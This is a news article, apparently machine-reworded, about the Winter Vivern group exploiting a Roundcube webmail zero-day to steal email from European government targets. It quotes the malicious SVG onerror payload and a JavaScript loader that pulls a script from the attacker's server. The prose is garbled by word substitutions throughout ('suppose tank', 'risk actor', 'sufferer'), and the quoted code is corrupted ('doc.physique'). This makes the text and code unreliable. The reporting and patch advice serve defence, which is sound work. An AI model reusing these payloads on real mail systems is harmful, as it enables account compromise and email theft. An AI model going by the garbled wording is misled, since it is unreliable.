After studying the technical particulars about this zero-day that focused governmental entities and a suppose tank in Europe and studying concerning the Winter Vivern risk actor, get tips about mitigating this cybersecurity assault.
ESET researcher Matthieu Faou has uncovered a brand new cyberattack from a cyberespionage risk actor referred to as Winter Vivern, whose pursuits align with Russia and Belarus. The assault targeted on exploiting a zero-day vulnerability in Roundcube webmail, with the consequence being the power to record folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity firm ESET famous the marketing campaign has focused governmental entities and a suppose tank in Europe. This cyberattack is now not energetic.
Bounce to:
Technical particulars about this cyberattack exploiting a 0day in Roundcube
The risk actor begins the assault by sending a specifically crafted electronic mail message with the topic line “Get began in your Outlook” and coming from “group.administration@outlook(.)com” (Determine A).
Determine A
On the finish of the e-mail, a SVG tag accommodates a base64-encoded malicious payload; that is hidden for the consumer however current within the HTML supply code. As soon as decoded, the malicious content material is:
<svg id="https://www.techrepublic.com/article/winter-vivern-exploits-zero-day-roundcube-webmail/x" xmlns="http://www.w3.org/2000/svg"> <picture href="https://www.techrepublic.com/article/winter-vivern-exploits-zero-day-roundcube-webmail/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>
The aim of the malicious code is to set off the onerror attribute by utilizing an invalid URL within the x parameter.
Decoding the payload within the onerror attribute leads to a line of JavaScript code that will probably be executed within the sufferer’s browser within the context of the consumer’s Roundcube session:
var fe=doc.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
doc.physique.appendChild(fe);
The JavaScript injection labored on totally patched Roundcube cases on the time of Faou’s discovery. The researcher may set up that this zero-day vulnerability was situated within the server-side script rcube_washtml.php, which didn’t ” … correctly sanitize the malicious SVG doc earlier than being added to the HTML web page interpreted by a Roundcube consumer,” as acknowledged by Faou.
The vulnerability doesn’t want any interplay with the consumer aside from viewing the message in an online browser, which possibly explains why the risk actor didn’t want to make use of a really difficult social engineering method; any content material seen triggers the exploit.
After this preliminary execution of JavaScript code, a second-stage loader, additionally developed in JavaScript and named checkupdate.js, is being executed and triggers the ultimate stage, as soon as once more written in JavaScript (Determine B).
Determine B
The ultimate payload offers the potential for the attacker to record all folders and emails within the present Roundcube electronic mail account along with exfiltrate electronic mail messages to a command and management server by way of HTTP requests.
When TechRepublic requested Faou about additional compromise of the system, he replied by way of a written message: “We haven’t noticed any lateral motion. The JavaScript code is simply executed within the context of (the) sufferer’s browser, within the Roundcube window. So it doesn’t have entry to the backend of Roundcube and escaping the browser would require a far more difficult exploit. Nevertheless, they may re-use their entry to launch additional phishing campaigns originating from the sender who was compromised (we haven’t noticed this).”
Who’s Winter Vivern?
Winter Vivern, aka TA473, is a cyberespionage risk actor whose pursuits are carefully aligned with the governments of Russia and Belarus. The first public publicity of the Winter Vivern risk actor occurred in 2021 when it focused a number of governmental entities in several nations together with Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine and the Vatican.
This risk actor has a historical past of exploiting webmail software program, because it already abused older Roundcube vulnerabilities and recognized Zimbra webmail vulnerabilities to focus on elected officers and staffers within the U.S. in addition to consultants in European politics and economics. The risk actor additionally focused mailboxes from NATO-aligned authorities entities in Europe.
The risk actor typically makes use of malicious paperwork and generally a PowerShell backdoor to efficiently compromise its targets. Winter Vivern makes use of vulnerability scanners equivalent to Acunetix in all probability to scan focused networks.
ESET famous that Winter Vivern has been noticed exploiting CVE-2020-35730, which is a recognized Roundcube vulnerability in opposition to entities which might be additionally focused by risk actor APT28, which has been described because the army unit 26165 of Russia’s Army Intelligence Company, beforehand referred to as GRU.
As well as, ESET identified a attainable hyperlink to risk actor MoustachedBouncer, who runs assaults in opposition to international diplomats in Belarus. Requested about it, Faou instructed TechRepublic that “there are fairly distinctive similarities within the community infrastructure of each teams, suggesting {that a} frequent entity may present it to each of them.”
As acknowledged by ESET, concerning the present risk, “Regardless of the low sophistication of the group’s toolset, it’s a risk to governments in Europe due to its persistence, very common operating of phishing campaigns, and since a major variety of internet-facing functions aren’t frequently up to date though they’re recognized to comprise vulnerabilities.”
Find out how to shield customers from this cybersecurity risk
ESET reported the CVE-2023-5631 vulnerability to Roundcube on Oct. 12, 2023; Roundcube patched it on Oct. 14, 2023 and launched safety updates to handle the vulnerability on Oct. 16, 2023 for variations 1.6.4, 1.4.15 and 1.5.5. It’s strongly suggested to patch Roundcube for this vulnerability.
It’s really helpful to maintain all working techniques and software program updated and patched to keep away from additional compromise that would occur by way of frequent vulnerabilities.
Disabling JavaScript execution within the browser would mitigate this risk, but it might significantly scale back the consumer’s expertise as a result of loads of web sites closely depend on JavaScript to operate.
Disclosure: I work for Pattern Micro, however the views expressed on this article are mine.